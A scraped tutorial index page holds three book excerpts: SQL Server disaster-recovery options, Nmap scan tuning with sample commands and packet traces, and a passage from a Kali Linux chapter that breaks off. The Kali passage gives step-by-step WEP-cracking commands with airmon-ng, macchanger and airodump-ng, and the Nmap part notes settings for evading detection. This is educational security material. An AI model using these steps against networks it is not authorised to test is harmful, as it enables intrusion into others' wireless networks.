Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7019 Articles
article-image-getting-know-sql-server-options-disaster-recovery
Sunith Shetty
27 Feb 2018
10 min read
Save for later

Getting to know SQL Server options for disaster recovery

Sunith Shetty
27 Feb 2018
10 min read
[box type="note" align="" class="" width=""]This article is an excerpt from a book written by Marek Chmel and Vladimír Mužný titled SQL Server 2017 Administrator's Guide. This book will help you learn to implement and administer successful database solutions with SQL Server 2017.[/box] Today, we will explore the disaster recovery basics to understand the common terms in high availability and disaster recovery. We will then discuss SQL Server offering for HA/DR options. Disaster recovery basics Disaster recovery (DR) is a set of tools, policies, and procedures, which help us during the recovery of your systems after a disastrous event. Disaster recovery is just a subset of a more complex discipline called business continuity planning, where more variables come in place and you expect more sophisticated plans on how to recover the business operations. With careful planning, you can minimize the effects of the disaster, because you have to keep in mind that it's nearly impossible to completely avoid disasters. The main goal of a disaster recovery plan is to minimize the downtime of our service and to minimize the data loss. To measure these objectives, we use special metrics: Recovery Point and Time Objectives. Recovery Time Objective (RTO) is the maximum time that you can use to recover the system. This time includes your efforts to fix the problem without starting the disaster recovery procedures, the recovery itself, proper testing after the disaster recovery, and the communication to the stakeholders. Once a disaster strikes, clocks are started to measure the disaster recovery actions and the Recovery Time Actual (RTA) metric is calculated. If you manage to recover the system within the Recovery Time Objective, which means that RTA < RTO, then you have met the metrics with a proper combination of the plan and your ability to restore the system. Recovery Point Objective (RPO) is the maximum tolerable period for acceptable data loss. This defines how much data can be lost due to disaster. The Recovery Point Objective has an impact on your implementation of backups, because you plan for a recovery strategy that has specific requirements for your backups. If you can avoid to lose one day of work, you can properly plan your backup types and the frequency of the backups that you need to take. The following image is an illustration of the very concepts that we discussed in the preceding paragraph: When we talk about system availability, we usually use a percentage of the availability time. This availability is a calculated uptime in a given year or month (any date metric that you need) and is usually compared to a following table of "9s". Availability also expresses a tolerable downtime in a given time frame so that the system still meets the availability metric. In the following table, we'll see some basic availability options with tolerable downtime a year and a day: Availability % Downtime a year Downtime a day 90% 36.5 days 2.4 hours 98% 7.3 days 28.8 minutes 99% 3.65 days 14.4 minutes 99.9% 8.76 hours 1.44 minutes 99.99% 52.56 minutes 8.64 seconds 99.999% 5.26 minutes less than 1 second This tolerable downtime consists of the unplanned downtime and can be caused by many factors: Natural Disasters Hardware failures Human errors (accidental deletes, code breakdowns, and so on) Security breaches Malware For these, we can have a mitigation plan in place that will help us reduce the downtime to a tolerable range, and we usually deploy a combination of high availability solutions and disaster recovery solutions so that we can quickly restore the operations. On the other hand, there's a reasonable set of events that require a downtime on your service due to the maintenance and regular operations, which does not affect the availability on your system. These can include the following: New releases of the software Operating system patching SQL Server patching Database maintenance and upgrades Our goal is to have the database online as much as possible, but there will be times when the database will be offline and, from the perspective of the management and operation, we're talking about several keywords such as uptime, downtime, time to repair, and time between failures, as you can see in the following image: It's really critical not only to have a plan for disaster recovery, but also to practice the disaster recovery itself. Many companies follow the procedure of proper disaster recovery plan testing with different types of exercise where each and every aspect of the disaster recovery is carefully evaluated by teams who are familiar with the tools and procedures for a real disaster event. This exercise may have different scope and frequency, as listed in the following points: Tabletop exercises usually involve only a small number of people and focus on a specific aspect of the DR plan. This would be a DBA team drill to recover a single SQL Server or a small set of servers with simulated outage. Medium-sized exercises will involve several teams to practice team communication and interaction. Complex exercises usually simulate larger events such as data center loss, where a new virtual data center is built and all new servers and services are provisioned by the involved teams. Such exercises should be run on a periodic basis so that all the teams and team personnel are up to speed with the disaster recovery plans. SQL Server options for high availability and disaster recovery SQL Server has many features that you can put in place to implement a HA/DR solution that will fit your needs. These features include the following: Always On Failover Cluster Always On Availability Groups Database mirroring Log shipping Replication In many cases, you will combine more of the features together, as your high availability and disaster recovery needs will overlap. HA/DR does not have to be limited to just one single feature. In complex scenarios, you'll plan for a primary high availability solution and secondary high availability solution that will work as your disaster recovery solution at the same time. Always On Failover Cluster An Always On Failover Cluster (FCI) is an instance-level protection mechanism, which is based on top of a Windows Failover Cluster Feature (WFCS). SQL Server instance will be installed across multiple WFCS nodes, where it will appear in the network as a single computer. All the resources that belong to one SQL Server instance (disk, network, names) can be owned by one node of the cluster and, during any planned or unplanned event like a failure of any server component, these can be moved to another node in the cluster to preserve operations and minimize downtime, as shown in the following image: Always On Availability Groups Always On Availability Groups were introduced with SQL Server 2012 to bring a database-level protection to the SQL Server. As with the Always On Failover Cluster, Availability Groups utilize the Windows Failover Cluster feature, but in this case, single SQL Server is not installed as a clustered instance but runs independently on several nodes. These nodes can be configured as Always On Availability Group nodes to host a database, which will be synchronized among the hosts. The replica can be either synchronous or asynchronous, so Always On Availability Groups are a good fit either as a solution for one data center or even distant data centers to keep your data safe. With new SQL Server versions, Always On Availability Groups were enhanced and provide many features for database high availability and disaster recovery scenarios. You can refer to the following image for a better understanding: Database mirroring Database mirroring is an older HA/DR feature available in SQL Server, which provides database-level protection. Mirroring allows synchronizing the databases between two servers, where you can include one more server as a witness server as a failover quorum. Unlike the previous two features, database mirroring does not require any special setup such as Failover Cluster and the configuration can be achieved via SSMS using a wizard available via database properties. Once a transaction occurs on the primary node, it's copied to the second node to the mirrored database. With proper configuration, database mirroring can provide failover options for high availability with automatic client redirection. Database mirroring is not preferred solution for HA/DR, since it's marked as a deprecated feature from SQL Server 2012 and is replaced by Basic Availability Groups on current versions. Log shipping Log shipping configuration, as the name suggests, is a mechanism to keep a database in sync by copying the logs to the remote server. Log shipping, unlike mirroring, is not copying each single transaction, but copies the transactions in batches via transaction log backup on the primary node and log restore on the secondary node. Unlike all previously mentioned features, log shipping does not provide an automatic failover option, so it's considered more as a disaster recovery option than a high availability one. Log shipping operates on regular intervals where three jobs have to run: Backup job to backup the transaction log on the primary system Copy job to copy the backups to the secondary system Restore job to restore the transaction log backup on the secondary system Log shipping supports multiple standby databases, which is quite an advantage compared to database mirroring. One more advantage is the standby configuration for log shipping, which allows read-only access to the secondary database. This is mainly used for many reporting scenarios, where the reporting applications use read-only access and such configuration allows performance offload to the secondary system. Replication Replication is a feature for data movement from one server to another that allows many different scenarios and topologies. Replication uses a model of publisher/subscriber, where the Publisher is the server offering the content via a replication article and subscribers are getting the data. The configuration is more complex compared to mirroring and log shipping features, but allows you much more variety in the configuration for security, performance, and topology. Replication has many benefits and a few of them are as follows: Works on the object level (whereas other features work on database or instance level) Allows merge replication, where more servers synchronize data between each other Allows bi-directional synchronization of data Allows other than SQL Server partners (Oracle, for example) There are several different replication types that can be used with SQL Server, and you can choose them based on the needs for HA/DR options and the data availability requirements on the secondary servers. These options include the following: Snapshot replication Transactional replication Peer-to-peer replication Merge replication We introduced the disaster recovery discipline with the whole big picture of business continuity on SQL Server. Disaster recovery is not only about having backups, but more about the ability to bring the service back to operation after severe failures. We have seen several options that can be used to implement part of disaster recovery on SQL Server--log shipping, replication, and mirroring. To know more about how to design and use an optimal database management strategy, do checkout the book SQL Server 2017 Administrator's Guide.  
Read more
  • 0
  • 0
  • 37420

article-image-optimize-scans
Packt
23 Jun 2017
20 min read
Save for later

To Optimize Scans

Packt
23 Jun 2017
20 min read
In this article by Paulino Calderon Pale author of the book Nmap Network Exploration and Security Auditing Cookbook, Second Edition, we will explore the following topics: Skipping phases to speed up scans Selecting the correct timing template Adjusting timing parameters Adjusting performance parameters (For more resources related to this topic, see here.) One of my favorite things about Nmap is how customizable it is. If configured properly, Nmap can be used to scan from single targets to millions of IP addresses in a single run. However, we need to be careful and need to understand the configuration options and scanning phases that can affect performance, but most importantly, really think about our scan objective beforehand. Do we need the information from the reverse DNS lookup? Do we know all targets are online? Is the network congested? Do targets respond fast enough? These and many more aspects can really add up to your scanning time. Therefore, optimizing scans is important and can save us hours if we are working with many targets. This article starts by introducing the different scanning phases, timing, and performance options. Unless we have a solid understanding of what goes on behind the curtains during a scan, we won't be able to completely optimize our scans. Timing templates are designed to work in common scenarios, but we want to go further and shave off those extra seconds per host during our scans. Remember that this can also not only improve performance but accuracy as well. Maybe those targets marked as offline were only too slow to respond to the probes sent after all. Skipping phases to speed up scans Nmap scans can be broken in phases. When we are working with many hosts, we can save up time by skipping tests or phases that return information we don't need or that we already have. By carefully selecting our scan flags, we can significantly improve the performance of our scans. This explains the process that takes place behind the curtains when scanning, and how to skip certain phases to speed up scans. How to do it... To perform a full port scan with the timing template set to aggressive, and without the reverse DNS resolution (-n) or ping (-Pn), use the following command: # nmap -T4 -n -Pn -p- 74.207.244.221 Note the scanning time at the end of the report: Nmap scan report for 74.207.244.221 Host is up (0.11s latency). Not shown: 65532 closed ports PORT     STATE SERVICE 22/tcp   open ssh 80/tcp   open http 9929/tcp open nping-echo Nmap done: 1 IP address (1 host up) scanned in 60.84 seconds Now, compare the running time that we get if we don't skip any tests: # nmap -p- scanme.nmap.org Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.11s latency). Not shown: 65532 closed ports PORT     STATE SERVICE 22/tcp   open ssh 80/tcp   open http 9929/tcp open nping-echo Nmap done: 1 IP address (1 host up) scanned in 77.45 seconds Although the time difference isn't very drastic, it really adds up when you work with many hosts. I recommend that you think about your objectives and the information you need, to consider the possibility of skipping some of the scanning phases that we will describe next. How it works... Nmap scans are divided in several phases. Some of them require some arguments to be set to run, but others, such as the reverse DNS resolution, are executed by default. Let's review the phases that can be skipped and their corresponding Nmap flag: Target enumeration: In this phase, Nmap parses the target list. This phase can't exactly be skipped, but you can save DNS forward lookups using only the IP addresses as targets. Host discovery: This is the phase where Nmap establishes if the targets are online and in the network. By default, Nmap sends an ICMP echo request and some additional probes, but it supports several host discovery techniques that can even be combined. To skip the host discovery phase (no ping), use the flag -Pn. And we can easily see what probes we skipped by comparing the packet trace of the two scans: $ nmap -Pn -p80 -n --packet-trace scanme.nmap.org SENT (0.0864s) TCP 106.187.53.215:62670 > 74.207.244.221:80 S ttl=46 id=4184 iplen=44 seq=3846739633 win=1024 <mss 1460> RCVD (0.1957s) TCP 74.207.244.221:80 > 106.187.53.215:62670 SA ttl=56 id=0 iplen=44 seq=2588014713 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.11s latency). PORT   STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds For scanning without skipping host discovery, we use the command: $ nmap -p80 -n --packet-trace scanme.nmap.orgSENT (0.1099s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=59 id=12270 iplen=28 SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:443 S ttl=59 id=38710 iplen=44 seq=1913383349 win=1024 <mss 1460> SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:80 A ttl=44 id=10665 iplen=40 seq=0 win=1024 SENT (0.1102s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=51 id=42939 iplen=40 RCVD (0.2120s) ICMP 74.207.244.221 > 106.187.53.215 Echo reply (type=0/code=0) ttl=56 id=2147 iplen=28 SENT (0.2731s) TCP 106.187.53.215:43199 > 74.207.244.221:80 S ttl=51 id=34952 iplen=44 seq=2609466214 win=1024 <mss 1460> RCVD (0.3822s) TCP 74.207.244.221:80 > 106.187.53.215:43199 SA ttl=56 id=0 iplen=44 seq=4191686720 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). PORT   STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds Reverse DNS resolution: Host names often reveal by themselves additional information and Nmap uses reverse DNS lookups to obtain them. This step can be skipped by adding the argument -n to your scan arguments. Let's see the traffic generated by the two scans with and without reverse DNS resolution. First, let's skip reverse DNS resolution by adding -n to your command: $ nmap -n -Pn -p80 --packet-trace scanme.nmap.orgSENT (0.1832s) TCP 106.187.53.215:45748 > 74.207.244.221:80 S ttl=37 id=33309 iplen=44 seq=2623325197 win=1024 <mss 1460> RCVD (0.2877s) TCP 74.207.244.221:80 > 106.187.53.215:45748 SA ttl=56 id=0 iplen=44 seq=3220507551 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). PORT   STATE SERVICE 80/tcp open http   Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds And if we try the same command but not' skipping reverse DNS resolution, as follows: $ nmap -Pn -p80 --packet-trace scanme.nmap.org NSOCK (0.0600s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8 NSOCK (0.0600s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID                                                 18 NSOCK (0.0600s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24 NSOCK (0.0600s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID                                                 34 NSOCK (0.0600s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40 NSOCK (0.0600s) Read request from IOD #3 [106.187.34.20:53] (timeout: -1ms) EID                                                 50 NSOCK (0.0600s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]:                                                 =............221.244.207.74.in-addr.arpa..... NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53] NSOCK (0.0600s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53] NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53] NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53] NSOCK (0.0620s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes) NSOCK (0.0620s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID                                                 66 NSOCK (0.0620s) nsi_delete() (IOD #1) NSOCK (0.0620s) msevent_cancel() on event #66 (type READ) NSOCK (0.0620s) nsi_delete() (IOD #2) NSOCK (0.0620s) msevent_cancel() on event #34 (type READ) NSOCK (0.0620s) nsi_delete() (IOD #3) NSOCK (0.0620s) msevent_cancel() on event #50 (type READ) SENT (0.0910s) TCP 106.187.53.215:46089 > 74.207.244.221:80 S ttl=42 id=23960 ip                                                 len=44 seq=1992555555 win=1024 <mss 1460> RCVD (0.1932s) TCP 74.207.244.221:80 > 106.187.53.215:46089 SA ttl=56 id=0 iplen                                                =44 seq=4229796359 win=14600 <mss 1460> Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). PORT   STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds Port scanning: In this phase, Nmap determines the state of the ports. By default, it uses SYN/TCP Connect scanning depending on the user privileges, but several other port scanning techniques are supported. Although this may not be so obvious, Nmap can do a few different things with targets without port scanning them like resolving their DNS names or checking whether they are online. For this reason, this phase can be skipped with the argument -sn: $ nmap -sn -R --packet-trace 74.207.244.221 SENT (0.0363s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=56 id=36390 iplen=28 SENT (0.0364s) TCP 106.187.53.215:53376 > 74.207.244.221:443 S ttl=39 id=22228 iplen=44 seq=155734416 win=1024 <mss 1460> SENT (0.0365s) TCP 106.187.53.215:53376 > 74.207.244.221:80 A ttl=46 id=36835 iplen=40 seq=0 win=1024 SENT (0.0366s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=50 id=2630 iplen=40 RCVD (0.1377s) TCP 74.207.244.221:443 > 106.187.53.215:53376 RA ttl=56 id=0 iplen=40 seq=0 win=0 NSOCK (0.1660s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8 NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 18 NSOCK (0.1660s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24 NSOCK (0.1660s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID 34 NSOCK (0.1660s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40 NSOCK (0.1660s) Read request from IOD #3 [106.187.34.20:53] (timeout: -1ms) EID 50 NSOCK (0.1660s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]: [............221.244.207.74.in-addr.arpa..... NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53] NSOCK (0.1660s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53] NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53] NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53] NSOCK (0.1660s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes) NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 66 NSOCK (0.1660s) nsi_delete() (IOD #1) NSOCK (0.1660s) msevent_cancel() on event #66 (type READ) NSOCK (0.1660s) nsi_delete() (IOD #2) NSOCK (0.1660s) msevent_cancel() on event #34 (type READ) NSOCK (0.1660s) nsi_delete() (IOD #3) NSOCK (0.1660s) msevent_cancel() on event #50 (type READ) Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up (0.10s latency). Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds In the previous example, we can see that an ICMP echo request and a reverse DNS lookup were performed (We forced DNS lookups with the option -R), but no port scanning was done. There's more... I recommend that you also run a couple of test scans to measure the speeds of the different DNS servers. I've found that ISPs tend to have the slowest DNS servers, but you can make Nmap use different DNS servers by specifying the argument --dns-servers. For example, to use Google's DNS servers, use the following command: # nmap -R --dns-servers 8.8.8.8,8.8.4.4 -O scanme.nmap.org You can test your DNS server speed by comparing the scan times. The following command tells Nmap not to ping or scan the port and only perform a reverse DNS lookup: $ nmap -R -Pn -sn 74.207.244.221 Nmap scan report for scanme.nmap.org (74.207.244.221) Host is up. Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix-Scanning Phases for more information. Selecting the correct timing template Nmap includes six templates that set different timing and performance arguments to optimize your scans based on network condition. Even though Nmap automatically adjusts some of these values, it is recommended that you set the correct timing template to hint Nmap about the speed of your network connection and the target's response time. The following will teach you about Nmap's timing templates and how to choose the more appropriate one. How to do it... Open your terminal and type the following command to use the aggressive timing template (-T4). Let's also use debugging (-d) to see what Nmap option -T4 sets: # nmap -T4 -d 192.168.4.20 --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 500, min 100, max 1250 max-scan-delay: TCP 10, UDP 1000, SCTP 10 parallelism: min 0, max 0 max-retries: 6, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- <Scan output removed for clarity> You may use the integers between 0 and 5, for example,-T[0-5]. How it works... The option -T is used to set the timing template in Nmap. Nmap provides six timing templates to help users tune the timing and performance arguments. The available timing templates and their initial configuration values are as follows: Paranoid(-0)—This template is useful to avoid detection systems, but it is painfully slow because only one port is scanned at a time, and the timeout between probes is 5 minutes: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 300000, min 100, max 300000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 1 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Sneaky (-1)—This template is useful for avoiding detection systems but is still very slow: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 15000, min 100, max 15000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 1 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Polite (-2)—This template is used when scanning is not supposed to interfere with the target system, very conservative and safe setting: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 1 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Normal (-3)—This is Nmap's default timing template, which is used when the argument -T is not set: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Aggressive (-4)—This is the recommended timing template for broadband and Ethernet connections: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 500, min 100, max 1250 max-scan-delay: TCP 10, UDP 1000, SCTP 10 parallelism: min 0, max 0 max-retries: 6, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- Insane (-5)—This timing template sacrifices accuracy for speed: --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 250, min 50, max 300 max-scan-delay: TCP 5, UDP 1000, SCTP 5 parallelism: min 0, max 0 max-retries: 2, host-timeout: 900000 min-rate: 0, max-rate: 0 --------------------------------------------- There's more... An interactive mode in Nmap allows users to press keys to dynamically change the runtime variables, such as verbose, debugging, and packet tracing. Although the discussion of including timing and performance options in the interactive mode has come up a few times in the development mailing list; so far, this hasn't been implemented yet. However, there is an unofficial patch submitted in June 2012 that allows you to change the minimum and maximum packet rate values(--max-rateand --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883. Adjusting timing parameters Nmap not only adjusts itself to different network and target conditions while scanning, but it can be fine-tuned using timing options to improve performance. Nmap automatically calculates packet round trip, timeout, and delay values, but these values can also be set manually through specific settings. The following describes the timing parameters supported by Nmap. How to do it... Enter the following command to adjust the initial round trip timeout, the delay between probes and a time out for each scanned host: # nmap -T4 --scan-delay 1s --initial-rtt-timeout 150ms --host-timeout 15m -d scanme.nmap.org --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 150, min 100, max 1250 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 6, host-timeout: 900000 min-rate: 0, max-rate: 0 --------------------------------------------- How it works... Nmap supports different timing arguments that can be customized. However, setting these values incorrectly will most likely hurt performance rather than improve it. Let's examine closer each timing parameter and learn its Nmap option parameter name. The Round Trip Time (RTT) value is used by Nmap to know when to give up or retransmit a probe response. Nmap estimates this value by analyzing previous responses, but you can set the initial RTT timeout with the argument --initial-rtt-timeout, as shown in the following command: # nmap -A -p- --initial-rtt-timeout 150ms <target> In addition, you can set the minimum and maximum RTT timeout values with--min-rtt-timeout and --max-rtt-timeout, respectively, as shown in the following command: # nmap -A -p- --min-rtt-timeout 200ms --max-rtt-timeout 600ms <target> Another very important setting we can control in Nmap is the waiting time between probes. Use the arguments --scan-delay and --max-scan-delay to set the waiting time and maximum amount of time allowed to wait between probes, respectively, as shown in the following commands: # nmap -A --max-scan-delay 10s scanme.nmap.org # nmap -A --scan-delay 1s scanme.nmap.org Note that the arguments previously shown are very useful when avoiding detection mechanisms. Be careful not to set --max-scan-delay too low because it will most likely miss the ports that are open. There's more... If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout: # nmap -sV -A -p- --host-timeout 5m <target> Estimating round trip times with Nping To use Nping to estimate the round trip time taken between the target and you, the following command can be used: # nping -c30 <target> This will make Nping send 30 ICMP echo request packets, and after it finishes, it will show the average, minimum, and maximum RTT values obtained: # nping -c30 scanme.nmap.org ... SENT (29.3569s) ICMP 50.116.1.121 > 74.207.244.221 Echo request (type=8/code=0) ttl=64 id=27550 iplen=28 RCVD (29.3576s) ICMP 74.207.244.221 > 50.116.1.121 Echo reply (type=0/code=0) ttl=63 id=7572 iplen=28 Max rtt: 10.170ms | Min rtt: 0.316ms | Avg rtt: 0.851ms Raw packets sent: 30 (840B) | Rcvd: 30 (840B) | Lost: 0 (0.00%) Tx time: 29.09096s | Tx bytes/s: 28.87 | Tx pkts/s: 1.03 Rx time: 30.09258s | Rx bytes/s: 27.91 | Rx pkts/s: 1.00 Nping done: 1 IP address pinged in 30.47 seconds Examine the round trip times and use the maximum to set the correct --initial-rtt-timeout and --max-rtt-timeout values. The official documentation recommends using double the maximum RTT value for the --initial-rtt-timeout, and as high as four times the maximum round time value for the –max-rtt-timeout. Displaying the timing settings Enable debugging to make Nmap inform you about the timing settings before scanning: $ nmap -d<target> --------------- Timing report --------------- hostgroups: min 1, max 100000 rtt-timeouts: init 1000, min 100, max 10000 max-scan-delay: TCP 1000, UDP 1000, SCTP 1000 parallelism: min 0, max 0 max-retries: 10, host-timeout: 0 min-rate: 0, max-rate: 0 --------------------------------------------- To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix-Scanning Phases for more information. Adjusting performance parameters Nmap not only adjusts itself to different network and target conditions while scanning, but it also supports several parameters that affect the behavior of Nmap, such as the number of hosts scanned concurrently, number of retries, and number of allowed probes. Learning how to adjust these parameters properly can reduce a lot of your scanning time. The following explains the Nmap parameters that can be adjusted to improve performance. How to do it... Enter the following command, adjusting the values for your target condition: $ nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target> How it works... The command shown previously tells Nmap to scan and report by grouping no less than 100 (--min-hostgroup 100) and no more than 500 hosts (--max-hostgroup 500). It also tells Nmap to retry only twice before giving up on any port (--max-retries 2): # nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target> It is important to note that setting these values incorrectly will most likely hurt the performance or accuracy rather than improve it. Nmap sends many probes during its port scanning phase due to the ambiguity of what a lack of responsemeans; either the packet got lost, the service is filtered, or the service is not open. By default, Nmap adjusts the number of retries based on the network conditions, but you can set this value with the argument --max-retries. By increasing the number of retries, we can improve Nmap's accuracy, but keep in mind this sacrifices speed: $ nmap --max-retries 10<target> The arguments --min-hostgroup and --max-hostgroup control the number of hosts that we probe concurrently. Keep in mind that reports are also generated based on this value, so adjust it depending on how often would you like to see the scan results. Larger groups are optimalto improve performance, but you may prefer smaller host groups on slow networks: # nmap -A -p- --min-hostgroup 100 --max-hostgroup 500 <target> There is also a very important argument that can be used to limit the number of packets sent per second by Nmap. The arguments --min-rate and --max-rate need to be used carefully to avoid undesirable effects. These rates are set automatically by Nmap if the arguments are not present: # nmap -A -p- --min-rate 50 --max-rate 100 <target> Finally, the arguments --min-parallelism and --max-parallelism can be used to control the number of probes for a host group. By setting these arguments, Nmap will no longer adjust the values dynamically: # nmap -A --max-parallelism 1 <target> # nmap -A --min-parallelism 10 --max-parallelism 250 <target> There's more... If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout, as shown in the following command: # nmap -sV -A -p- --host-timeout 5m <target> Interactive mode in Nmap allows users to press keys to dynamically change the runtime variables, such as verbose, debugging, and packet tracing. Although the discussion of including timing and performance options in the interactive mode has come up a few times in the development mailing list, so far this hasn't been implemented yet. However, there is an unofficial patch submitted in June 2012 that allows you to change the minimum and maximum packet rate values (--max-rate and --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883. To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix-Scanning Phases for more information. Summary In this article, we are finally able to learn how to implement and optimize scans. Nmap scans among several clients, allowing us to save time and take advantage of extra bandwidth and CPU resources. This article is short but full of tips for optimizing your scans. Prepare to dig deep into Nmap's internals and the timing and performance parameters! Resources for Article: Further resources on this subject: Introduction to Network Security Implementing OpenStack Networking and Security Communication and Network Security
Read more
  • 0
  • 0
  • 37401

article-image-wireless-attacks-kali-linux
Packt
11 Oct 2013
13 min read
Save for later

Wireless Attacks in Kali Linux

Packt
11 Oct 2013
13 min read
In this article, by Willie L. Pritchett, author of the Kali Linux Cookbook, we will learn about the various wireless attacks. These days, wireless networks are everywhere. With users being on the go like never before, having to remain stationary because of having to plug into an Ethernet cable to gain Internet access is not feasible. For this convenience, there is a price to be paid; wireless connections are not as secure as Ethernet connections. In this article, we will explore various methods for manipulating radio network traffic including mobile phones and wireless networks. We will cover the following topics in this article: Wireless network WEP cracking Wireless network WPA/WPA2 cracking Automating wireless network cracking Accessing clients using a fake AP URL traffic manipulation Port redirection Sniffing network traffic (For more resources related to this topic, see here.) Wireless network WEP cracking Wireless Equivalent Privacy, or WEP as it's commonly referred to, has been around since 1999 and is an older security standard that was used to secure wireless networks. In 2003, WEP was replaced by WPA and later by WPA2. Due to having more secure protocols available, WEP encryption is rarely used. As a matter of fact, it is highly recommended that you never use WEP encryption to secure your network! There are many known ways to exploit WEP encryption and we will explore one of those ways in this recipe. In this recipe, we will use the AirCrack suite to crack a WEP key. The AirCrack suite (or AirCrack NG as it's commonly referred to) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WEP key. Getting ready In order to perform the tasks of this recipe, experience with the Kali terminal window is required. A supported wireless card configured for packet injection will also be required. In case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. Please ensure your wireless card allows for packet injection as this is not something that all wireless cards support. How to do it... Let's begin the process of using AirCrack to crack a network session secured by WEP. Open a terminal window and bring up a list of wireless network interfaces: airmon-ng Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned. Next, we need to stop the wlan0 interface and take it down so that we can change our MAC address in the next step. airmon-ng stop ifconfig wlan0 down Next, we need to change the MAC address of our interface. Since the MAC address of your machine identifies you on any network, changing the identity of our machine allows us to keep our true MAC address hidden. In this case, we will use 00:11:22:33:44:55. macchanger --mac 00:11:22:33:44:55 wlan0 Now we need to restart airmon-ng. airmon-ng start wlan0 Next, we will use airodump to locate the available wireless networks nearby. airodump-ng wlan0 A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right click your 